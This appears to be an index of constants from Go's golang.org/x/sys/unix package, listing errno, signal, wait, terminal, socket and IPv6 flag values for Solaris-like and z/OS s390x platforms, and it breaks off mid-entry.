0xe constant WCONTFLG (line 1189) | WCONTFLG = 0xffff constant WCONTINUED (line 1190) | WCONTINUED = 0x8 constant WCOREFLG (line 1191) | WCOREFLG = 0x80 constant WEXITED (line 1192) | WEXITED = 0x1 constant WNOHANG (line 1193) | WNOHANG = 0x40 constant WNOWAIT (line 1194) | WNOWAIT = 0x80 constant WOPTMASK (line 1195) | WOPTMASK = 0xcf constant WRAP (line 1196) | WRAP = 0x20000 constant WSIGMASK (line 1197) | WSIGMASK = 0x7f constant WSTOPFLG (line 1198) | WSTOPFLG = 0x7f constant WSTOPPED (line 1199) | WSTOPPED = 0x4 constant WTRAPPED (line 1200) | WTRAPPED = 0x2 constant WUNTRACED (line 1201) | WUNTRACED = 0x4 constant XCASE (line 1202) | XCASE = 0x4 constant XTABS (line 1203) | XTABS = 0x1800 constant E2BIG (line 1208) | E2BIG = syscall.Errno(0x7) constant EACCES (line 1209) | EACCES = syscall.Errno(0xd) constant EADDRINUSE (line 1210) | EADDRINUSE = syscall.Errno(0x7d) constant EADDRNOTAVAIL (line 1211) | EADDRNOTAVAIL = syscall.Errno(0x7e) constant EADV (line 1212) | EADV = syscall.Errno(0x44) constant EAFNOSUPPORT (line 1213) | EAFNOSUPPORT = syscall.Errno(0x7c) constant EAGAIN (line 1214) | EAGAIN = syscall.Errno(0xb) constant EALREADY (line 1215) | EALREADY = syscall.Errno(0x95) constant EBADE (line 1216) | EBADE = syscall.Errno(0x32) constant EBADF (line 1217) | EBADF = syscall.Errno(0x9) constant EBADFD (line 1218) | EBADFD = syscall.Errno(0x51) constant EBADMSG (line 1219) | EBADMSG = syscall.Errno(0x4d) constant EBADR (line 1220) | EBADR = syscall.Errno(0x33) constant EBADRQC (line 1221) | EBADRQC = syscall.Errno(0x36) constant EBADSLT (line 1222) | EBADSLT = syscall.Errno(0x37) constant EBFONT (line 1223) | EBFONT = syscall.Errno(0x39) constant EBUSY (line 1224) | EBUSY = syscall.Errno(0x10) constant ECANCELED (line 1225) | ECANCELED = syscall.Errno(0x2f) constant ECHILD (line 1226) | ECHILD = syscall.Errno(0xa) constant ECHRNG (line 1227) | ECHRNG = syscall.Errno(0x25) constant ECOMM (line 1228) | ECOMM = syscall.Errno(0x46) constant ECONNABORTED (line 1229) | ECONNABORTED = syscall.Errno(0x82) constant ECONNREFUSED (line 1230) | ECONNREFUSED = syscall.Errno(0x92) constant ECONNRESET (line 1231) | ECONNRESET = syscall.Errno(0x83) constant EDEADLK (line 1232) | EDEADLK = syscall.Errno(0x2d) constant EDEADLOCK (line 1233) | EDEADLOCK = syscall.Errno(0x38) constant EDESTADDRREQ (line 1234) | EDESTADDRREQ = syscall.Errno(0x60) constant EDOM (line 1235) | EDOM = syscall.Errno(0x21) constant EDQUOT (line 1236) | EDQUOT = syscall.Errno(0x31) constant EEXIST (line 1237) | EEXIST = syscall.Errno(0x11) constant EFAULT (line 1238) | EFAULT = syscall.Errno(0xe) constant EFBIG (line 1239) | EFBIG = syscall.Errno(0x1b) constant EHOSTDOWN (line 1240) | EHOSTDOWN = syscall.Errno(0x93) constant EHOSTUNREACH (line 1241) | EHOSTUNREACH = syscall.Errno(0x94) constant EIDRM (line 1242) | EIDRM = syscall.Errno(0x24) constant EILSEQ (line 1243) | EILSEQ = syscall.Errno(0x58) constant EINPROGRESS (line 1244) | EINPROGRESS = syscall.Errno(0x96) constant EINTR (line 1245) | EINTR = syscall.Errno(0x4) constant EINVAL (line 1246) | EINVAL = syscall.Errno(0x16) constant EIO (line 1247) | EIO = syscall.Errno(0x5) constant EISCONN (line 1248) | EISCONN = syscall.Errno(0x85) constant EISDIR (line 1249) | EISDIR = syscall.Errno(0x15) constant EL2HLT (line 1250) | EL2HLT = syscall.Errno(0x2c) constant EL2NSYNC (line 1251) | EL2NSYNC = syscall.Errno(0x26) constant EL3HLT (line 1252) | EL3HLT = syscall.Errno(0x27) constant EL3RST (line 1253) | EL3RST = syscall.Errno(0x28) constant ELIBACC (line 1254) | ELIBACC = syscall.Errno(0x53) constant ELIBBAD (line 1255) | ELIBBAD = syscall.Errno(0x54) constant ELIBEXEC (line 1256) | ELIBEXEC = syscall.Errno(0x57) constant ELIBMAX (line 1257) | ELIBMAX = syscall.Errno(0x56) constant ELIBSCN (line 1258) | ELIBSCN = syscall.Errno(0x55) constant ELNRNG (line 1259) | ELNRNG = syscall.Errno(0x29) constant ELOCKUNMAPPED (line 1260) | ELOCKUNMAPPED = syscall.Errno(0x48) constant ELOOP (line 1261) | ELOOP = syscall.Errno(0x5a) constant EMFILE (line 1262) | EMFILE = syscall.Errno(0x18) constant EMLINK (line 1263) | EMLINK = syscall.Errno(0x1f) constant EMSGSIZE (line 1264) | EMSGSIZE = syscall.Errno(0x61) constant EMULTIHOP (line 1265) | EMULTIHOP = syscall.Errno(0x4a) constant ENAMETOOLONG (line 1266) | ENAMETOOLONG = syscall.Errno(0x4e) constant ENETDOWN (line 1267) | ENETDOWN = syscall.Errno(0x7f) constant ENETRESET (line 1268) | ENETRESET = syscall.Errno(0x81) constant ENETUNREACH (line 1269) | ENETUNREACH = syscall.Errno(0x80) constant ENFILE (line 1270) | ENFILE = syscall.Errno(0x17) constant ENOANO (line 1271) | ENOANO = syscall.Errno(0x35) constant ENOBUFS (line 1272) | ENOBUFS = syscall.Errno(0x84) constant ENOCSI (line 1273) | ENOCSI = syscall.Errno(0x2b) constant ENODATA (line 1274) | ENODATA = syscall.Errno(0x3d) constant ENODEV (line 1275) | ENODEV = syscall.Errno(0x13) constant ENOENT (line 1276) | ENOENT = syscall.Errno(0x2) constant ENOEXEC (line 1277) | ENOEXEC = syscall.Errno(0x8) constant ENOLCK (line 1278) | ENOLCK = syscall.Errno(0x2e) constant ENOLINK (line 1279) | ENOLINK = syscall.Errno(0x43) constant ENOMEM (line 1280) | ENOMEM = syscall.Errno(0xc) constant ENOMSG (line 1281) | ENOMSG = syscall.Errno(0x23) constant ENONET (line 1282) | ENONET = syscall.Errno(0x40) constant ENOPKG (line 1283) | ENOPKG = syscall.Errno(0x41) constant ENOPROTOOPT (line 1284) | ENOPROTOOPT = syscall.Errno(0x63) constant ENOSPC (line 1285) | ENOSPC = syscall.Errno(0x1c) constant ENOSR (line 1286) | ENOSR = syscall.Errno(0x3f) constant ENOSTR (line 1287) | ENOSTR = syscall.Errno(0x3c) constant ENOSYS (line 1288) | ENOSYS = syscall.Errno(0x59) constant ENOTACTIVE (line 1289) | ENOTACTIVE = syscall.Errno(0x49) constant ENOTBLK (line 1290) | ENOTBLK = syscall.Errno(0xf) constant ENOTCONN (line 1291) | ENOTCONN = syscall.Errno(0x86) constant ENOTDIR (line 1292) | ENOTDIR = syscall.Errno(0x14) constant ENOTEMPTY (line 1293) | ENOTEMPTY = syscall.Errno(0x5d) constant ENOTRECOVERABLE (line 1294) | ENOTRECOVERABLE = syscall.Errno(0x3b) constant ENOTSOCK (line 1295) | ENOTSOCK = syscall.Errno(0x5f) constant ENOTSUP (line 1296) | ENOTSUP = syscall.Errno(0x30) constant ENOTTY (line 1297) | ENOTTY = syscall.Errno(0x19) constant ENOTUNIQ (line 1298) | ENOTUNIQ = syscall.Errno(0x50) constant ENXIO (line 1299) | ENXIO = syscall.Errno(0x6) constant EOPNOTSUPP (line 1300) | EOPNOTSUPP = syscall.Errno(0x7a) constant EOVERFLOW (line 1301) | EOVERFLOW = syscall.Errno(0x4f) constant EOWNERDEAD (line 1302) | EOWNERDEAD = syscall.Errno(0x3a) constant EPERM (line 1303) | EPERM = syscall.Errno(0x1) constant EPFNOSUPPORT (line 1304) | EPFNOSUPPORT = syscall.Errno(0x7b) constant EPIPE (line 1305) | EPIPE = syscall.Errno(0x20) constant EPROTO (line 1306) | EPROTO = syscall.Errno(0x47) constant EPROTONOSUPPORT (line 1307) | EPROTONOSUPPORT = syscall.Errno(0x78) constant EPROTOTYPE (line 1308) | EPROTOTYPE = syscall.Errno(0x62) constant ERANGE (line 1309) | ERANGE = syscall.Errno(0x22) constant EREMCHG (line 1310) | EREMCHG = syscall.Errno(0x52) constant EREMOTE (line 1311) | EREMOTE = syscall.Errno(0x42) constant ERESTART (line 1312) | ERESTART = syscall.Errno(0x5b) constant EROFS (line 1313) | EROFS = syscall.Errno(0x1e) constant ESHUTDOWN (line 1314) | ESHUTDOWN = syscall.Errno(0x8f) constant ESOCKTNOSUPPORT (line 1315) | ESOCKTNOSUPPORT = syscall.Errno(0x79) constant ESPIPE (line 1316) | ESPIPE = syscall.Errno(0x1d) constant ESRCH (line 1317) | ESRCH = syscall.Errno(0x3) constant ESRMNT (line 1318) | ESRMNT = syscall.Errno(0x45) constant ESTALE (line 1319) | ESTALE = syscall.Errno(0x97) constant ESTRPIPE (line 1320) | ESTRPIPE = syscall.Errno(0x5c) constant ETIME (line 1321) | ETIME = syscall.Errno(0x3e) constant ETIMEDOUT (line 1322) | ETIMEDOUT = syscall.Errno(0x91) constant ETOOMANYREFS (line 1323) | ETOOMANYREFS = syscall.Errno(0x90) constant ETXTBSY (line 1324) | ETXTBSY = syscall.Errno(0x1a) constant EUNATCH (line 1325) | EUNATCH = syscall.Errno(0x2a) constant EUSERS (line 1326) | EUSERS = syscall.Errno(0x5e) constant EWOULDBLOCK (line 1327) | EWOULDBLOCK = syscall.Errno(0xb) constant EXDEV (line 1328) | EXDEV = syscall.Errno(0x12) constant EXFULL (line 1329) | EXFULL = syscall.Errno(0x34) constant SIGABRT (line 1334) | SIGABRT = syscall.Signal(0x6) constant SIGALRM (line 1335) | SIGALRM = syscall.Signal(0xe) constant SIGBUS (line 1336) | SIGBUS = syscall.Signal(0xa) constant SIGCANCEL (line 1337) | SIGCANCEL = syscall.Signal(0x24) constant SIGCHLD (line 1338) | SIGCHLD = syscall.Signal(0x12) constant SIGCLD (line 1339) | SIGCLD = syscall.Signal(0x12) constant SIGCONT (line 1340) | SIGCONT = syscall.Signal(0x19) constant SIGEMT (line 1341) | SIGEMT = syscall.Signal(0x7) constant SIGFPE (line 1342) | SIGFPE = syscall.Signal(0x8) constant SIGFREEZE (line 1343) | SIGFREEZE = syscall.Signal(0x22) constant SIGHUP (line 1344) | SIGHUP = syscall.Signal(0x1) constant SIGILL (line 1345) | SIGILL = syscall.Signal(0x4) constant SIGINFO (line 1346) | SIGINFO = syscall.Signal(0x29) constant SIGINT (line 1347) | SIGINT = syscall.Signal(0x2) constant SIGIO (line 1348) | SIGIO = syscall.Signal(0x16) constant SIGIOT (line 1349) | SIGIOT = syscall.Signal(0x6) constant SIGJVM1 (line 1350) | SIGJVM1 = syscall.Signal(0x27) constant SIGJVM2 (line 1351) | SIGJVM2 = syscall.Signal(0x28) constant SIGKILL (line 1352) | SIGKILL = syscall.Signal(0x9) constant SIGLOST (line 1353) | SIGLOST = syscall.Signal(0x25) constant SIGLWP (line 1354) | SIGLWP = syscall.Signal(0x21) constant SIGPIPE (line 1355) | SIGPIPE = syscall.Signal(0xd) constant SIGPOLL (line 1356) | SIGPOLL = syscall.Signal(0x16) constant SIGPROF (line 1357) | SIGPROF = syscall.Signal(0x1d) constant SIGPWR (line 1358) | SIGPWR = syscall.Signal(0x13) constant SIGQUIT (line 1359) | SIGQUIT = syscall.Signal(0x3) constant SIGSEGV (line 1360) | SIGSEGV = syscall.Signal(0xb) constant SIGSTOP (line 1361) | SIGSTOP = syscall.Signal(0x17) constant SIGSYS (line 1362) | SIGSYS = syscall.Signal(0xc) constant SIGTERM (line 1363) | SIGTERM = syscall.Signal(0xf) constant SIGTHAW (line 1364) | SIGTHAW = syscall.Signal(0x23) constant SIGTRAP (line 1365) | SIGTRAP = syscall.Signal(0x5) constant SIGTSTP (line 1366) | SIGTSTP = syscall.Signal(0x18) constant SIGTTIN (line 1367) | SIGTTIN = syscall.Signal(0x1a) constant SIGTTOU (line 1368) | SIGTTOU = syscall.Signal(0x1b) constant SIGURG (line 1369) | SIGURG = syscall.Signal(0x15) constant SIGUSR1 (line 1370) | SIGUSR1 = syscall.Signal(0x10) constant SIGUSR2 (line 1371) | SIGUSR2 = syscall.Signal(0x11) constant SIGVTALRM (line 1372) | SIGVTALRM = syscall.Signal(0x1c) constant SIGWAITING (line 1373) | SIGWAITING = syscall.Signal(0x20) constant SIGWINCH (line 1374) | SIGWINCH = syscall.Signal(0x14) constant SIGXCPU (line 1375) | SIGXCPU = syscall.Signal(0x1e) constant SIGXFSZ (line 1376) | SIGXFSZ = syscall.Signal(0x1f) constant SIGXRES (line 1377) | SIGXRES = syscall.Signal(0x26) FILE: vendor/golang.org/x/sys/unix/zerrors_zos_s390x.go constant BRKINT (line 13) | BRKINT = 0x0001 constant CLOCK_MONOTONIC (line 14) | CLOCK_MONOTONIC = 0x1 constant CLOCK_PROCESS_CPUTIME_ID (line 15) | CLOCK_PROCESS_CPUTIME_ID = 0x2 constant CLOCK_REALTIME (line 16) | CLOCK_REALTIME = 0x0 constant CLOCK_THREAD_CPUTIME_ID (line 17) | CLOCK_THREAD_CPUTIME_ID = 0x3 constant CS8 (line 18) | CS8 = 0x0030 constant CSIZE (line 19) | CSIZE = 0x0030 constant ECHO (line 20) | ECHO = 0x00000008 constant ECHONL (line 21) | ECHONL = 0x00000001 constant FD_CLOEXEC (line 22) | FD_CLOEXEC = 0x01 constant FD_CLOFORK (line 23) | FD_CLOFORK = 0x02 constant FNDELAY (line 24) | FNDELAY = 0x04 constant F_CLOSFD (line 25) | F_CLOSFD = 9 constant F_CONTROL_CVT (line 26) | F_CONTROL_CVT = 13 constant F_DUPFD (line 27) | F_DUPFD = 0 constant F_DUPFD2 (line 28) | F_DUPFD2 = 8 constant F_GETFD (line 29) | F_GETFD = 1 constant F_GETFL (line 30) | F_GETFL = 259 constant F_GETLK (line 31) | F_GETLK = 5 constant F_GETOWN (line 32) | F_GETOWN = 10 constant F_OK (line 33) | F_OK = 0x0 constant F_RDLCK (line 34) | F_RDLCK = 1 constant F_SETFD (line 35) | F_SETFD = 2 constant F_SETFL (line 36) | F_SETFL = 4 constant F_SETLK (line 37) | F_SETLK = 6 constant F_SETLKW (line 38) | F_SETLKW = 7 constant F_SETOWN (line 39) | F_SETOWN = 11 constant F_SETTAG (line 40) | F_SETTAG = 12 constant F_UNLCK (line 41) | F_UNLCK = 3 constant F_WRLCK (line 42) | F_WRLCK = 2 constant FSTYPE_ZFS (line 43) | FSTYPE_ZFS = 0xe9 constant FSTYPE_HFS (line 44) | FSTYPE_HFS = 0xc8 constant FSTYPE_NFS (line 45) | FSTYPE_NFS = 0xd5 constant FSTYPE_TFS (line 46) | FSTYPE_TFS = 0xe3 constant FSTYPE_AUTOMOUNT (line 47) | FSTYPE_AUTOMOUNT = 0xc1 constant IP6F_MORE_FRAG (line 48) | IP6F_MORE_FRAG = 0x0001 constant IP6F_OFF_MASK (line 49) | IP6F_OFF_MASK = 0xfff8 constant IP6F_RESERVED_MASK (line 50) | IP6F_RESERVED_MASK = 0x0006 constant IP6OPT_JUMBO (line 51) | IP6OPT_JUMBO = 0xc2 constant IP6OPT_JUMBO_LEN (line 52) | IP6OPT_JUMBO_LEN = 6 constant IP6OPT_MUTABLE (line 53) | IP6OPT_MUTABLE = 0x20 constant IP6OPT_NSAP_ADDR (line 54) | IP6OPT_NSAP_ADDR = 0xc3 constant IP6OPT_PAD1 (line 55) | IP6OPT_PAD1 = 0x00 constant IP6OPT_PADN (line 56) | IP6OPT_PADN = 0x01 constant IP6OPT_ROUTER_ALERT (line 57) | IP6OPT_ROUTER_ALERT = 0x05 constant IP6OPT_TUNNEL_LIMIT (line 58) | IP6OPT_TUNNEL_LIMIT = 0x04 constant IP6OPT_TYPE_DISCARD (line 59) | IP6OPT_TYPE_DISCARD = 0x40 constant IP6OPT_TYPE_FORCEICMP (line 60) | IP6OPT_TYPE_FORCEICMP = 0x80 constant IP6OPT_TYPE_ICMP (line 61) | IP6OPT_TYPE_ICMP = 0xc0 constant IP6OPT_TYPE_SKIP (line 62) | IP6OPT_TYPE_SKIP = 0x00 constant IP6_ALERT_AN (line 63) | IP6_ALERT_AN = 0x0002 constant IP6_ALERT_MLD (line 64) | IP6_ALERT_MLD = 0x0000 constant IP6_ALERT_RSVP (line 65) | IP6_ALERT_RSVP = 0x0001 constant IPPORT_RESERVED (line 66) | IPPORT_RESERVED = 1024 constant IPPORT_USERRESERVED (line 67) | IPPORT_USERRESERVED = 5000 constant IPPROTO_AH (line 68) | IPPROTO_AH = 51 constant SOL_AH (line 69) | SOL_AH = 51 constant IPPROTO_DSTOPTS (line 70) | IPPROTO_DSTOPTS = 60 constant SOL_DSTOPTS (line 71) | SOL_DSTOPTS = 60 constant IPPROTO_EGP (line 72) | IPPROTO_EGP = 8 constant SOL_EGP (line 73) | SOL_EGP = 8 constant IPPROTO_ESP (line 74) | IPPROTO_ESP = 50 constant SOL_ESP (line 75) | SOL_ESP = 50 constant IPPROTO_FRAGMENT (line 76) | IPPROTO_FRAGMENT = 44 constant SOL_FRAGMENT (line 77) | SOL_FRAGMENT = 44 constant IPPROTO_GGP (line 78) | IPPROTO_GGP = 2 constant SOL_GGP (line 79) | SOL_GGP = 2 constant IPPROTO_HOPOPTS (line 80) | IPPROTO_HOPOPTS = 0 constant SOL_HOPOPTS (line 81) | SOL_HOPOPTS = 0 constant IPPROTO_ICMP (line 82) | IPPROTO_ICMP = 1 constant SOL_ICMP (line 83) | SOL_ICMP = 1 constant IPPROTO_ICMPV6 (line 84) | IPPROTO_ICMPV6 = 58 constant SOL_ICMPV6 (line 85) | SOL_ICMPV6 = 58 constant IPPROTO_IDP (line 86) | IPPROTO_IDP = 22 constant SOL_IDP (line 87) | SOL_IDP = 22 constant IPPROTO_IP (line 88) | IPPROTO_IP = 0 constant SOL_IP (line 89) | SOL_IP = 0 constant IPPROTO_IPV6 (line 90) | IPPROTO_IPV6 = 41 constant SOL_IPV6 (line 91) | SOL_IPV6 = 41 constant IPPROTO_MAX (line 92) | IPPROTO_MAX = 256 constant SOL_MAX (line 93) | SOL_MAX = 256 constant IPPROTO_NONE (line 94) | IPPROTO_NONE = 59 constant SOL_NONE (line 95) | SOL_NONE = 59 constant IPPROTO_PUP (line 96) | IPPROTO_PUP = 12 constant SOL_PUP (line 97) | SOL_PUP = 12 constant IPPROTO_RAW (line 98) | IPPROTO_RAW = 255 constant SOL_RAW (line 99) | SOL_RAW = 255 constant IPPROTO_ROUTING (line 100) | IPPROTO_ROUTING = 43 constant SOL_ROUTING (line 101) | SOL_ROUTING = 43 constant IPPROTO_TCP (line 102) | IPPROTO_TCP = 6 constant SOL_TCP (line 103) | SOL_TCP = 6 constant IPPROTO_UDP (line 104) | IPPROTO_UDP = 17 constant SOL_UDP (line 105) | SOL_UDP = 17 constant IPV6_ADDR_PREFERENCES (line 106) | IPV6_ADDR_PREFERENCES = 32 constant IPV6_CHECKSUM (line 107) | IPV6_CHECKSUM = 19 constant IPV6_DONTFRAG (line 108) | IPV6_DONTFRAG = 29 constant IPV6_DSTOPTS (line 109) | IPV6_DSTOPTS = 23 constant IPV6_HOPLIMIT (line 110) | IPV6_HOPLIMIT = 11 constant IPV6_HOPOPTS (line 111) | IPV6_HOPOPTS = 22 constant IPV6_JOIN_GROUP (line 112) | IPV6_JOIN_GROUP = 5 constant IPV6_LEAVE_GROUP (line 113) | IPV6_LEAVE_GROUP = 6 constant IPV6_MULTICAST_HOPS (line 114) | IPV6_MULTICAST_HOPS = 9 constant IPV6_MULTICAST_IF (line 115) | IPV6_MULTICAST_IF = 7 constant IPV6_MULTICAST_LOOP (line 116) | IPV6_MULTICAST_LOOP = 4 constant IPV6_NEXTHOP (line 117) | IPV6_NEXTHOP = 20 constant IPV6_PATHMTU (line 118) | IPV6_PATHMTU = 12 constant IPV6_PKTINFO (line 119) | IPV6_PKTINFO = 13 constant IPV6_PREFER_SRC_CGA (line 120) | IPV6_PREFER_SRC_CGA = 0x10 constant IPV6_PREFER_SRC_COA (line 121) | IPV6_PREFER_SRC_COA = 0x02 constant IPV6_PREFER_SRC_HOME (line 122) | IPV6_PREFER_SRC_HOME = 0x01 constant IPV6_PREFER_SRC_NONCGA (line 123) | IPV6_PREFER_SRC_NONCGA = 0x20 constant IPV6_PREFER_SRC_PUBLIC (line 124) | IPV6_PREFER_SRC_PUBLIC = 0x08 constant IPV6_PREFER_SRC_TMP (line 125) | IPV6_PREFER_SRC_TMP = 0x04 constant IPV6_RECVDSTOPTS (line 126) | IPV6_RECVDSTOPTS = 28 constant IPV6_RECVHOPLIMIT (line 127) | IPV6_RECVHOPLIMIT = 14 constant IPV6_RECVHOPOPTS (line 128) | IPV6_RECVHOPOPTS = 26 constant IPV6_RECVPATHMTU (line 129) | IPV6_RECVPATHMTU = 16 constant IPV6_RECVPKTINFO (line 130) | IPV6_RECVPKTINFO = 15 constant IPV6_RECVRTHDR (line 131) | IPV6_RECVRTHDR = 25 constant IPV6_RECVTCLASS (line 132) | IPV6_RECVTCLASS = 31 constant IPV6_RTHDR (line 133) | IPV6_RTHDR = 21 constant IPV6_RTHDRDSTOPTS (line 134) | IPV6_RTHDRDSTOPTS = 24 constant IPV6_RTHDR_TYPE_0 (line 135) | IPV6_RTHDR_TYPE_0 = 0 constant IPV6_TCLASS (line 136) | IPV6_TCLASS = 30 constant IPV6_UNICAST_HOPS (line 137) | IPV6_UNICAST_HOPS = 3 constant IPV6_USE_MIN_MTU (line 138) | IPV6_USE_MIN_MTU = 18 constant IPV6_V6ONLY (line 139) | IPV6_V6ONLY = 10 constant IP_ADD_MEMBERSHIP (line 140) | IP_ADD_MEMBERSHIP = 5 constant IP_ADD_SOURCE_MEMBERSHIP (line 141) | IP_ADD_SOURCE_MEMBERSHIP = 12 constant IP_BLOCK_SOURCE (line 142) | IP_BLOCK_SOURCE = 10 constant IP_DEFAULT_MULTICAST_LOOP (line 143) | IP_DEFAULT_MULTICAST_LOOP = 1 constant IP_DEFAULT_MULTICAST_TTL (line 144) | IP_DEFAULT_MULTICAST_TTL = 1 constant IP_DROP_MEMBERSHIP (line 145) | IP_DROP_MEMBERSHIP = 6 constant IP_DROP_SOURCE_MEMBERSHIP (line 146) | IP_DROP_SOURCE_MEMBERSHIP = 13 constant IP_MAX_MEMBERSHIPS (line 147) | IP_MAX_MEMBERSHIPS = 20 constant IP_MULTICAST_IF (line 148) | IP_MULTICAST_IF = 7 constant IP_MULTICAST_LOOP (line 149) | IP_MULTICAST_LOOP = 4 constant IP_MULTICAST_TTL (line 150) | IP_MULTICAST_TTL = 3 constant IP_OPTIONS (line 151) | IP_OPTIONS = 1 constant IP_PKTINFO (line 152) | IP_PKTINFO = 101 constant IP_RECVPKTINFO (line 153) | IP_RECVPKTINFO = 102 constant IP_TOS (line 154) | IP_TOS = 2 constant IP_TTL (line 155) | IP_TTL = 3 constant IP_UNBLOCK_SOURCE (line 156) | IP_UNBLOCK_SOURCE = 11 constant ICANON (line 157) | ICANON = 0x0010 constant ICMP6_FILTER (line 158) | ICMP6_FILTER = 0x26 constant ICRNL (line 159) | ICRNL = 0x0002 constant IEXTEN (line 160) | IEXTEN = 0x0020 constant IGNBRK (line 161) | IGNBRK = 0x0004 constant IGNCR (line 162) | IGNCR = 0x0008 constant INLCR (line 163) | INLCR = 0x0020 constant ISIG (line 164) | ISIG = 0x0040 constant ISTRIP (line 165) | ISTRIP = 0x0080 constant IXON (line 166) | IXON = 0x0200 constant IXOFF (line 167) | IXOFF = 0x0100 constant LOCK_SH (line 168) | LOCK_SH = 0x1 constant LOCK_EX (line 169) | LOCK_EX = 0x2 constant LOCK_NB (line 170) | LOCK_NB = 0x4 constant LOCK_UN (line 171) | LOCK_UN = 0x8 constant POLLIN (line 172) | POLLIN = 0x0003 constant POLLOUT (line 173) | POLLOUT = 0x0004 constant POLLPRI (line 174) | POLLPRI = 0x0010 constant POLLERR (line 175) | POLLERR = 0x0020 constant POLLHUP (line 176) | POLLHUP = 0x0040 constant POLLNVAL (line 177) | POLLNVAL = 0x0080 constant PROT_READ (line 178) | PROT_READ = 0x1 constant PROT_WRITE (line 179) | PROT_WRITE = 0x2 constant PROT_NONE (line 180) | PROT_NONE = 0x4 constant PROT_EXEC (line 181) | PROT_EXEC = 0x8 constant MAP_PRIVATE (line 182) | MAP_PRIVATE = 0x1 constant MAP_SHARED (line 183) | MAP_SHARED = 0x2 constant MAP_FIXED (line 184) | MAP_FIXED = 0x4 constant MCAST_JOIN_GROUP (line 185) | MCAST_JOIN_GROUP = 40 constant MCAST_LEAVE_GROUP (line 186) | MCAST_LEAVE_GROUP = 41 constant MCAST_JOIN_SOURCE_GROUP (line 187) | MCAST_JOIN_SOURCE_GROUP = 42 constant MCAST_LEAVE_SOURCE_GROUP (line 188) | MCAST_LEAVE_SOURCE_GROUP = 43 constant MCAST_BLOCK_SOURCE (line 189) | MCAST_BLOCK_SOURCE = 44 constant MCAST_UNBLOCK_SOURCE (line 190) | MCAST_UNBLOCK_SOURCE = 45 constant MS_SYNC (line 191) | MS_SYNC = 0x1 constant MS_ASYNC (line 192) | MS_ASYNC = 0x2 constant MS_INVALIDATE (line 193) | MS_INVALIDATE = 0x4 constant MTM_RDONLY (line 194) | MTM_RDONLY = 0x80000000 constant MTM_RDWR (line 195) | MTM_RDWR = 0x40000000 constant MTM_UMOUNT (line 196) | MTM_UMOUNT = 0x10000000 constant MTM_IMMED (line 197) | MTM_IMMED = 0x08000000 constant MTM_FORCE (line 198) | MTM_FORCE = 0x04000000 constant MTM_DRAIN (line 199) | MTM_DRAIN = 0x02000000 constant MTM_RESET (line 200) | MTM_RESET = 0x01000000 constant MTM_SAMEMODE (line 201) | MTM_SAMEMODE = 0x00100000 constant MTM_UNQSEFORCE (line 202) | MTM_UNQSEFORCE = 0x00040000 constant MTM_NOSUID (line 203) | MTM_NOSUID = 0x00000400 constant MTM_SYNCHONLY (line 204) | MTM_SYNCHONLY = 0x00000200 constant MTM_REMOUNT (line 205) | MTM_REMOUNT = 0x00000100 constant MTM_NOSECURITY (line 206) | MTM_NOSECURITY = 0x00000080 constant NFDBITS (line 207) | NFDBITS = 0x20 constant O_ACCMODE (line 208) | O_ACCMODE = 0x03 constant O_APPEND (line 209) | O_APPEND = 0x08 constant O_ASYNCSIG (line 210) | O_ASYNCSIG = 0x0200 constant O_CREAT (line 211) | O_CREAT = 0x80 constant O_EXCL (line 212) | O_EXCL = 0x40 constant O_GETFL (line 213) | O_GETFL = 0x0F constant O_LARGEFILE (line 214) | O_LARGEFILE = 0x0400 constant O_NONBLOCK (line 215) | O_NONBLOCK = 0x04 constant O_RDONLY (line 216) | O_RDONLY = 0x02 constant O_RDWR (line 217) | O_RDWR = 0x03 constant O_SYNC (line 218) | O_SYNC = 0x0100 constant O_TRUNC (line 219) | O_TRUNC = 0x10 constant O_WRONLY (line 220) | O_WRONLY = 0x01 constant O_NOCTTY (line 221) | O_NOCTTY = 0x20 constant OPOST (line 222) | OPOST = 0x0001 constant ONLCR (line 223) | ONLCR = 0x0004 constant PARENB (line 224) | PARENB = 0x0200 constant PARMRK (line 225) | PARMRK = 0x0400 constant QUERYCVT (line 226) | QUERYCVT = 3 constant RUSAGE_CHILDREN (line 227) | RUSAGE_CHILDREN = -0x1 constant RUSAGE_SELF (line 228) | RUSAGE_SELF = 0x0 constant SEEK_CUR (line 229) | SEEK_CUR = 1 constant SEEK_END (line 230) | SEEK_END = 2 constant SEEK_SET (line 231) | SEEK_SET = 0 constant SETAUTOCVTALL (line 232) | SETAUTOCVTALL = 5 constant SETAUTOCVTON (line 233) | SETAUTOCVTON = 2 constant SETCVTALL (line 234) | SETCVTALL = 4 constant SETCVTOFF (line 235) | SETCVTOFF = 0 constant SETCVTON (line 236) | SETCVTON = 1 constant AF_APPLETALK (line 237) | AF_APPLETALK = 16 constant AF_CCITT (line 238) | AF_CCITT = 10 constant AF_CHAOS (line 239) | AF_CHAOS = 5 constant AF_DATAKIT (line 240) | AF_DATAKIT = 9 constant AF_DLI (line 241) | AF_DLI = 13 constant AF_ECMA (line 242) | AF_ECMA = 8 constant AF_HYLINK (line 243) | AF_HYLINK = 15 constant AF_IMPLINK (line 244) | AF_IMPLINK = 3 constant AF_INET (line 245) | AF_INET = 2 constant AF_INET6 (line 246) | AF_INET6 = 19 constant AF_INTF (line 247) | AF_INTF = 20 constant AF_IUCV (line 248) | AF_IUCV = 17 constant AF_LAT (line 249) | AF_LAT = 14 constant AF_LINK (line 250) | AF_LINK = 18 constant AF_MAX (line 251) | AF_MAX = 30 constant AF_NBS (line 252) | AF_NBS = 7 constant AF_NDD (line 253) | AF_NDD = 23 constant AF_NETWARE (line 254) | AF_NETWARE = 22 constant AF_NS (line 255) | AF_NS = 6 constant AF_PUP (line 256) | AF_PUP = 4 constant AF_RIF (line 257) | AF_RIF = 21 constant AF_ROUTE (line 258) | AF_ROUTE = 20 constant AF_SNA (line 259) | AF_SNA = 11 constant AF_UNIX (line 260) | AF_UNIX = 1 constant AF_UNSPEC (line 261) | AF_UNSPEC = 0 constant IBMTCP_IMAGE (line 262) | IBMTCP_IMAGE = 1 constant MSG_ACK_EXPECTED (line 263) | MSG_ACK_EXPECTED = 0x10 constant MSG_ACK_GEN (line 264) | MSG_ACK_GEN = 0x40 constant MSG_ACK_TIMEOUT (line 265) | MSG_ACK_TIMEOUT = 0x20 constant MSG_CONNTERM (line 266) | MSG_CONNTERM = 0x80 constant MSG_CTRUNC (line 267) | MSG_CTRUNC = 0x20 constant MSG_DONTROUTE (line 268) | MSG_DONTROUTE = 0x4 constant MSG_EOF (line 269) | MSG_EOF = 0x8000 constant MSG_EOR (line 270) | MSG_EOR = 0x8 constant MSG_MAXIOVLEN (line 271) | MSG_MAXIOVLEN = 16 constant MSG_NONBLOCK (line 272) | MSG_NONBLOCK = 0x4000 constant MSG_OOB (line 